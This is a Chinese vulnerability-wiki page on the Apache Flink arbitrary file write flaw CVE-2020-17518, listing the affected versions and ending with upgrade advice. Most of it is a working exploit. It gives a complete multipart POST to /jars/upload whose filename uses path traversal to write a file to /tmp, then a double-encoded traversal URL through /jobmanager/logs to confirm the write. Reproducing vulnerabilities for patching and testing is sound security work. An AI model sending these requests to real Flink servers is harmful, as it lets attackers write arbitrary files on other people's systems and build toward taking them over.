跳转至

Apache Flink任意文件写入漏洞(CVE 2020 17518)

简介

Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能

影响版本

1.11.0

1.11.1

1.11.2

漏洞利用

写入EXP:

POST /jars/upload HTTP/1.1
Host: 127.0.0.1:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 185

------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success"

zzzzzzz
------WebKitFormBoundaryoZ8meKnrrso89R6Y--

验证写入:

http://127.0.0.1/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fsuccess

成功写入:

修复建议

所有用户升级最新版


最后更新: 2021-03-24